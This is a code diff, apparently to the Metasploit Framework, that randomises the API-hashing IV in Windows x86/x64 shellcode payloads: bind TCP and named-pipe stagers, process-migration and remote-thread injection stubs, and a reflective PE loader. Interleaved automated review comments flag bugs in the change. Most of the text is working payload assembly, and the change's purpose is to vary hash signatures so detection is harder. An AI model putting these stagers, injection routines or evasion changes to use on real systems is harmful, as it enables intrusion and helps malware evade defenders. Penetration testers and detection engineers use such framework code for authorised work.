diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 2ae1b7ccb5304..9371e011dcc2e 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -84,7 +84,18 @@ def replace_var(raw, name, offset, pack) method = datastore[name] method = 'thread' if (!method or @@exit_types.include?(method) == false) - raw[offset, 4] = [ @@exit_types[method] ].pack(pack || 'V') + if respond_to?(:block_api_hash) + exit_hash = block_api_hash('kernel32.dll', { + 'seh' => 'SetUnhandledExceptionFilter', + 'thread' => 'ExitThread', + 'process' => 'ExitProcess', + 'none' => 'GetLastError' + }[method]).to_i(16) + else + exit_hash = @@exit_types[method] + end + + raw[offset, 4] = [ exit_hash ].pack(pack || 'V') return true end @@ -112,6 +123,7 @@ def handle_intermediate_stage(conn, payload) # data into a buffer which is allocated with VirtualAlloc to avoid running # out of stack space or NX problems. # See the source file: /external/source/shellcode/windows/midstager.asm + # TODO: We should update the midstager to use block-api randomization (passing it to metasm, and block api...) midstager = "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" + "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" + diff --git a/lib/msf/core/payload/windows/bind_named_pipe.rb b/lib/msf/core/payload/windows/bind_named_pipe.rb index e78a00bb0f85c..b06e21f71ad2f 100644 --- a/lib/msf/core/payload/windows/bind_named_pipe.rb +++ b/lib/msf/core/payload/windows/bind_named_pipe.rb @@ -118,7 +118,7 @@ def asm_send_uuid(uuid=nil) db #{raw_to_db(uuid_raw)} ; lpBuffer get_uuid_address: push edi : hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} + push #{block_api_hash('kernel32.dll', 'WriteFile')} call ebp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten) ^ end 
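Review bot: In replace_var the exit-type → API-name mapping is an inline hash literal rebuilt on every call, and a `method` value that `@@exit_types` accepts but this literal lacks would pass `nil` as the function name to `block_api_hash`; hoist it to a frozen constant beside `@@exit_types`, e.g. `EXIT_FUNCS = { 'seh' => 'SetUnhandledExceptionFilter', 'thread' => 'ExitThread', 'process' => 'ExitProcess', 'none' => 'GetLastError' }.freeze`, and look it up with `EXIT_FUNCS.fetch(method)` so a missing entry fails loudly instead of hashing a nil name. The `.to_i(16)` also assumes `block_api_hash` returns the hash as a hex string, while every other call site interpolates the value straight into assembly, so a one-line comment stating that return contract would help the next reader. replace_var's signature and the rest of its body are outside this hunk.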
@@ -154,7 +154,7 @@ def asm_bind_named_pipe(opts={}) call get_pipe_name ; lpName db "#{full_pipe_name}", 0x00 get_pipe_name: - push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')} + push #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')} call ebp ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize, ; nInBufferSize, nDefaultTimeOut, lpSecurityAttributes) mov edi, eax ; save hPipe (using sockedi convention) @@ -171,11 +171,11 @@ def asm_bind_named_pipe(opts={}) connect_pipe: push 0 ; lpOverlapped push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')} + push #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')} call ebp ; ConnectNamedPipe(hPipe, lpOverlapped) ; check for failure - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')} + push #{block_api_hash('kernel32.dll', 'GetLastError')} call ebp ; GetLastError() cmp eax, 0x217 ; looking for ERROR_PIPE_CONNECTED jz get_stage_size ; success @@ -184,7 +184,7 @@ def asm_bind_named_pipe(opts={}) ; wait before trying again push #{retry_wait} - push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + push #{block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep(millisecs) jmp connect_pipe ^ @@ -202,7 +202,7 @@ def asm_bind_named_pipe(opts={}) push 0 ; lpMaxCollectionCount push ecx ; lpMode (PIPE_WAIT) push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} + push #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} call ebp ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout) ^ end 
@@ -217,7 +217,7 @@ def asm_bind_named_pipe(opts={}) lea ecx, [esp+16] ; lpBuffer push ecx push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped) pop eax ; lpNumberOfBytesRead pop esi ; lpBuffer (stage size) @@ -238,7 +238,7 @@ def asm_bind_named_pipe(opts={}) push 0x1000 ; MEM_COMMIT push esi ; dwLength push 0 ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE) ^ @@ -267,7 +267,7 @@ def asm_bind_named_pipe(opts={}) push edx ; nNumberOfBytesToRead push ebx ; lpBuffer push edi ; hPipe - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped) pop edx ; lpNumberOfBytesRead ^ @@ -283,13 +283,13 @@ def asm_bind_named_pipe(opts={}) push 0x8000 ; MEM_RELEASE push 0 ; dwSize, 0 to decommit whole block push ecx ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_RELEASE) cleanup_file: ; cleanup the pipe handle push edi ; file handle - push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + push #{block_api_hash('kernel32.dll', 'CloseHandle')} call ebp ; CloseHandle(hPipe) jmp failure 
@@ -319,14 +319,14 @@ def asm_bind_named_pipe(opts={}) call get_kernel32_name db "kernel32", 0x00 get_kernel32_name: - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')} + push #{block_api_hash('kernel32.dll', 'GetModuleHandleA')} call ebp ; GetModuleHandleA("kernel32") call get_exit_name db "ExitThread", 0x00 get_exit_name: ; lpProcName push eax ; hModule - push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')} + push #{block_api_hash('kernel32.dll', 'GetProcAddress')} call ebp ; GetProcAddress(hModule, "ExitThread") push 0 ; dwExitCode call eax ; ExitProcess(0) diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb index 4dc52a96ae4ec..642db625c75ed 100644 --- a/lib/msf/core/payload/windows/bind_tcp.rb +++ b/lib/msf/core/payload/windows/bind_tcp.rb @@ -121,14 +121,14 @@ def asm_bind_tcp(opts={}) push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack. push 0x5F327377 ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); push 11 @@ -144,7 +144,7 @@ def asm_bind_tcp(opts={}) ; we do not specify a protocol [5] push 1 ; push SOCK_STREAM push #{addr_fam} ; push AF_INET/6 - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this 
@@ -155,7 +155,7 @@ def asm_bind_tcp(opts={}) push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used) push esi ; pointer to the sockaddr_in struct push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + push #{block_api_hash('ws2_32.dll', 'bind')} call ebp ; bind( s, &sockaddr_in, 16 ); ^ @@ -170,18 +170,18 @@ def asm_bind_tcp(opts={}) asm << %Q^ ; backlog, pushed earlier [3] push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')} + push #{block_api_hash('ws2_32.dll', 'listen')} call ebp ; listen( s, 0 ); ; we set length for the sockaddr struct to zero, pushed earlier [2] ; we dont set the optional sockaddr param, pushed earlier [1] push edi ; listening socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')} + push #{block_api_hash('ws2_32.dll', 'accept')} call ebp ; accept( s, 0, 0 ); push edi ; push the listening socket xchg edi, eax ; replace the listening socket with the new connected socket for further comms - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket( s ); ^ @@ -204,7 +204,7 @@ def asm_block_recv(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ 
@@ -223,7 +223,7 @@ def asm_block_recv(opts={}) push 0x1000 ; MEM_COMMIT push esi ; push the newly received second stage length. push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... xchg ebx, eax ; ebx = our new memory address for the new stage @@ -233,7 +233,7 @@ def asm_block_recv(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -261,7 +261,7 @@ def asm_block_recv(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end diff --git a/lib/msf/core/payload/windows/bind_tcp_rc4.rb b/lib/msf/core/payload/windows/bind_tcp_rc4.rb index 49dc042112a6c..6394d184cd3fd 100644 --- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb +++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb @@ -61,7 +61,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ 
@@ -83,7 +83,7 @@ def asm_block_recv_rc4(opts={}) ; push esi ; push the newly received second stage length. push ecx ; push the alloc length push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box @@ -96,7 +96,7 @@ def asm_block_recv_rc4(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -138,7 +138,7 @@ def asm_block_recv_rc4(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end diff --git a/lib/msf/core/payload/windows/block_api.rb b/lib/msf/core/payload/windows/block_api.rb index 447efe139e6e4..8100f1ede3c31 100644 --- a/lib/msf/core/payload/windows/block_api.rb +++ b/lib/msf/core/payload/windows/block_api.rb 
@@ -10,12 +10,32 @@ module Msf ### module Payload::Windows::BlockApi + @block_api_iv = nil + + def block_api_iv(opts={}) + @block_api_iv ||= rand(0x100000000) + end + def asm_block_api(opts={}) - Rex::Payloads::Shuffle.from_graphml_file( + asm = Rex::Payloads::Shuffle.from_graphml_file( File.join(Msf::Config.install_root, 'data', 'shellcode', 'block_api.x86.graphml'), arch: ARCH_X86, name: 'api_call' ) + iv = opts.fetch(:block_api_iv) { block_api_iv } + # Patch the assembly to set the correct IV + # db 0xbf, 0x00, 0x00, 0x00, 0x00 => mov edi, + iv_bytes = [iv].pack('V').bytes.map { |b| "0x%02x" % b }.join(', ') + unless asm.include?("db 0xbf, 0x00, 0x00, 0x00, 0x00") + raise "Failed to patch block_api assembly with IV 0x#{iv.to_s(16).rjust(8, '0')} (#{iv_bytes})" + end + asm.sub!("db 0xbf, 0x00, 0x00, 0x00, 0x00", "db 0xbf, #{iv_bytes}") + asm + end + + def block_api_hash(mod, func, opts={}) + iv = opts.fetch(:block_api_iv) { block_api_iv } + Rex::Text.block_api_hash(mod, func, iv: iv) end end diff --git a/lib/msf/core/payload/windows/exitfunk.rb b/lib/msf/core/payload/windows/exitfunk.rb index 92ae5ca0e4faa..d3dd32effd9da 100644 --- a/lib/msf/core/payload/windows/exitfunk.rb +++ b/lib/msf/core/payload/windows/exitfunk.rb @@ -18,7 +18,7 @@ def asm_exitfunk(opts={}) when 'seh' asm << %Q^ - mov ebx, 0x#{Msf::Payload::Windows.exit_types['seh'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'SetUnhandledExceptionFilter')} push.i8 0 ; push the exit function parameter push ebx ; push the hash of the exit function call ebp ; SetUnhandledExceptionFilter(0) 
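Review bot: `@block_api_iv = nil` in the module body sets an instance variable on the `Payload::Windows::BlockApi` module object itself, not on the payload instances whose `block_api_iv` reads `@block_api_iv`, so the line has no effect and is misleading; drop it. The memoised IV is what keeps the `mov edi` patched into `asm_block_api` consistent with every `block_api_hash` value, so the `opts[:block_api_iv]` override should be documented as needing to be passed to both, e.g. `# :block_api_iv must be the IV baked into asm_block_api, otherwise no hash resolves`. `opts` in `block_api_iv(opts={})` is unused and can be removed, and `rand(0x100000000)` is `Kernel#rand`, which follows a global `srand` — acceptable for hash diversity, but worth a comment so nobody mistakes it for a secret.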
@@ -32,14 +32,14 @@ def asm_exitfunk(opts={}) when 'thread' asm << %Q^ - mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)} - push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) + mov ebx, #{block_api_hash('kernel32.dll', 'ExitThread')} + push #{block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) call ebp ; GetVersion(); (AL will = major version and AH will = minor version) cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7 jl exitfunk_goodbye ; Then just call the exit function... cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... jne exitfunk_goodbye ; - mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread + mov ebx, #{block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread exitfunk_goodbye: ; We now perform the actual call to the exit function push.i8 0 ; push the exit function parameter push ebx ; push the hash of the exit function @@ -48,7 +48,7 @@ def asm_exitfunk(opts={}) when 'process', nil asm << %Q^ - mov ebx, 0x#{Msf::Payload::Windows.exit_types['process'].to_s(16)} + mov ebx, #{block_api_hash('kernel32.dll', 'ExitProcess')} push.i8 0 ; push the exit function parameter push ebx ; push the hash of the exit function call ebp ; ExitProcess(0) @@ -56,7 +56,7 @@ def asm_exitfunk(opts={}) when 'sleep' asm << %Q^ - mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov ebx, #{block_api_hash('kernel32.dll', 'Sleep')} push 300000 ; 300 seconds push ebx ; push the hash of the function call ebp ; Sleep(300000) diff --git a/lib/msf/core/payload/windows/migrate_common.rb b/lib/msf/core/payload/windows/migrate_common.rb index 8253d6efdaa5c..3a0eb18b746d3 100644 --- a/lib/msf/core/payload/windows/migrate_common.rb 
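Review bot: In the `thread` case the `cmp bl, 0xE0` / `jne exitfunk_goodbye` pair two lines below the changed `mov ebx` still tests the low byte of the legacy, IV-less ExitThread hash, so with a randomised IV the ntdll!RtlExitUserThread substitution on Vista and later will almost always be skipped. Since `ebx` always holds the ExitThread hash inside this branch, the comparison can simply be removed, or computed from the real value, e.g. `cmp bl, 0x#{(block_api_hash('kernel32.dll', 'ExitThread').to_i(16) & 0xff).to_s(16)}`, if `block_api_hash` returns a hex string as the `.to_i(16)` in windows.rb suggests. The same stale `cmp bl, 0xE0` survives in both exitfunc blocks of prepend_migrate (the `prepend_migrate` and `prepend_migrate_64` hunks).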
+++ b/lib/msf/core/payload/windows/migrate_common.rb @@ -31,7 +31,7 @@ def generate(opts={}) #{generate_migrate(opts)} signal_event: push dword [esi] ; Event handle is pointed at by esi - push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + push #{block_api_hash('kernel32.dll', 'SetEvent')} call ebp ; SetEvent(handle) call_payload: call dword [esi+8] ; Invoke the associated payload diff --git a/lib/msf/core/payload/windows/migrate_named_pipe.rb b/lib/msf/core/payload/windows/migrate_named_pipe.rb index 59817f553a001..1d4ee7cb7d3fd 100644 --- a/lib/msf/core/payload/windows/migrate_named_pipe.rb +++ b/lib/msf/core/payload/windows/migrate_named_pipe.rb @@ -32,7 +32,7 @@ def generate_migrate(opts = {}) mov edi, [esi+16] ; The duplicated pipe handle is in the migrate context. signal_pipe_event: push dword [esi] ; Event handle is pointed at by esi - push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + push #{block_api_hash('kernel32.dll', 'SetEvent')} call ebp ; SetEvent(handle) call_pipe_payload: call dword [esi+8] ; call the associated payload diff --git a/lib/msf/core/payload/windows/migrate_tcp.rb b/lib/msf/core/payload/windows/migrate_tcp.rb index 664ba82c7b280..34277b11848c3 100644 --- a/lib/msf/core/payload/windows/migrate_tcp.rb +++ b/lib/msf/core/payload/windows/migrate_tcp.rb 
@@ -34,14 +34,14 @@ def generate_migrate(opts={}) push '32' push 'ws2_' push esp ; pointer to 'ws2_32' - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA('ws2_32') init_networking: mov eax, #{WSA_VERSION} ; EAX == version, and is also used for size sub esp, eax ; allocate space for the WSAData structure push esp ; Pointer to the WSAData structure push eax ; Version required - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup(Version, &WSAData) create_socket: push eax ; eax is 0 on success, use it for flags @@ -53,7 +53,7 @@ def generate_migrate(opts={}) push eax ; SOCK_STREAM inc eax push eax ; AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, &info, 0, 0) xchg edi, eax ^ diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb index 0c00d6c554264..8acc2208592db 100644 --- a/lib/msf/core/payload/windows/prepend_migrate.rb +++ b/lib/msf/core/payload/windows/prepend_migrate.rb 
@@ -70,21 +70,21 @@ def prepend_migrate(buf) exitblock = %Q^ ;sleep push -1 - push #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) call ebp ; Sleep( ... ); ^ # Check to see if we can find exitfunc in the payload exitfunc_block_asm = %Q^ exitfunk: - mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread - push #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) + mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... kernel32.dll!ExitThread + push #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) call ebp ; GetVersion(); (AL will = major version and AH will = minor version) cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7 jl goodbye ; Then just call the exit function... cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... jne goodbye ; - mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function + mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThreadgoodbye: ; We now perform the actual call to the exit function goodbye: push 0x0 ; push the exit function parameter push ebx ; push the hash of the exit function 
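Review bot: `block_api_obj` is not defined in this hunk, and every `block_api_obj.block_api_hash` value here must be computed under the same IV that is baked into the api_call stub this block reaches through `call ebp`; if `block_api_obj` constructs a fresh object per call, `@block_api_iv ||= rand(...)` would hand each interpolation its own IV and none of the pushed hashes would resolve. Memoise it (`@block_api_obj ||= ...`) or pass an explicit `block_api_iv:` taken from the object that emitted the stub, and add a comment at its definition naming that contract. prepend_migrate's body starts before this hunk.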
@@ -135,7 +135,7 @@ def prepend_migrate(buf) add esp,-400 ; adjust the stack to avoid corruption lea edx,[esp+0x60] push edx - push #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) call ebp ; GetStartupInfoA( &si ); lea eax,[esp+0x60] ; Put startupinfo pointer back in eax @@ -158,7 +158,7 @@ def prepend_migrate(buf) push esi ; lpCommandLine push ebx ; lpApplicationName - push #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) call ebp ; CreateProcessA( &si ); ; if we didn't get a new process, use this one @@ -186,7 +186,7 @@ def prepend_migrate(buf) xor ebx,ebx push ebx ; address push [edi] ; handle - push #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) call ebp ; VirtualAllocEx( ...); ; eax now contains the destination @@ -198,7 +198,7 @@ def prepend_migrate(buf) begin_of_payload_return: ; lpBuffer push eax ; lpBaseAddress push [edi] ; hProcess - push #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) call ebp ; WriteProcessMemory( ...) ; run the code (CreateRemoteThread()) 
@@ -210,7 +210,7 @@ def prepend_migrate(buf) push ebx ; stacksize push ebx ; lpThreadAttributes push [edi] - push #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) + push #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) call ebp ; CreateRemoteThread( ...); #{exitblock} ; jmp to exitfunc or long sleep @@ -244,21 +244,21 @@ def prepend_migrate_64(buf) ;sleep xor rcx,rcx dec rcx ; rcx = -1 - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "Sleep")} ; hash( "kernel32.dll", "Sleep" ) call rbp ; Sleep( ... ); EOS exitfunc_block_asm = %Q^ exitfunk: - mov ebx, #{Rex::Text.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) + mov ebx, #{block_api_obj.block_api_hash("kernel32.dll", "ExitThread")} ; The EXITFUNK as specified by user... + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetVersion")} ; hash( "kernel32.dll", "GetVersion" ) call rbp ; GetVersion(); (AL will = major version and AH will = minor version) add rsp, 40 ; cleanup the default param space on stack cmp al, 0x6 ; If we are not running on Windows Vista, 2008 or 7 jl goodbye ; Then just call the exit function... cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... jne goodbye ; - mov ebx, #{Rex::Text.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread + mov ebx, #{block_api_obj.block_api_hash("ntdll.dll", "RtlExitUserThread")} ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread goodbye: ; We now perform the actual call to the exit function push 0x0 ; pop rcx ; set the exit function parameter 
@@ -311,7 +311,7 @@ def prepend_migrate_64(buf) ; get our own startupinfo at esp+0x60 add rsp,-400 ; adjust the stack to avoid corruption lea rcx,[rsp+0x30] - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "GetStartupInfoA")} ; hash( "kernel32.dll", "GetStartupInfoA" ) call rbp ; GetStartupInfoA( &si ); jmp getcommand @@ -333,7 +333,7 @@ def prepend_migrate_64(buf) mov r8, rcx ; lpProcessAttributes mov rdx, rsi ; lpCommandLine ; rcx is already zero ; lpApplicationName - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateProcessA")} ; hash( "kernel32.dll", "CreateProcessA" ) call rbp ; CreateProcessA( &si ); ; if we didn't get a new process, use this one @@ -363,7 +363,7 @@ def prepend_migrate_64(buf) migrate_asm << <<-EOS xor rdx,rdx ; address mov rcx, [rdi] ; handle - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "VirtualAllocEx")} ; hash( "kernel32.dll", "VirtualAllocEx" ) call rbp ; VirtualAllocEx( ...); ; eax now contains the destination - save in ebx @@ -377,7 +377,7 @@ def prepend_migrate_64(buf) pop r8 ; lpBuffer mov rdx, rax ; lpBaseAddress mov rcx, [rdi] ; hProcess - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "WriteProcessMemory")} ; hash( "kernel32.dll", "WriteProcessMemory" ) call rbp ; WriteProcessMemory( ...); ; run the code (CreateRemoteThread()) 
@@ -389,7 +389,7 @@ def prepend_migrate_64(buf) mov r8, rcx ; stacksize ;rdx already equals 0 ; lpThreadAttributes mov rcx, [rdi] - mov r10d, #{Rex::Text.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) + mov r10d, #{block_api_obj.block_api_hash("kernel32.dll", "CreateRemoteThread")} ; hash( "kernel32.dll", "CreateRemoteThread" ) call rbp ; CreateRemoteThread( ...); #{exitblock} ; jmp to exitfunc or long sleep diff --git a/lib/msf/core/payload/windows/reflective_pe_loader.rb b/lib/msf/core/payload/windows/reflective_pe_loader.rb index be7a3890562b6..d26291688c66c 100644 --- a/lib/msf/core/payload/windows/reflective_pe_loader.rb +++ b/lib/msf/core/payload/windows/reflective_pe_loader.rb @@ -4,7 +4,6 @@ module Msf module Payload::Windows::ReflectivePELoader include Payload::Windows::BlockApi def asm_reflective_pe_loader(opts) - prologue = '' if opts[:is_dll] == true prologue = %( @@ -33,7 +32,7 @@ def asm_reflective_pe_loader(opts) push 0x103000 ; MEM_COMMIT | MEM_TOP_DOWN | MEM_RESERVE push dword [esp+12] ; dwSize push 0x00 ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; 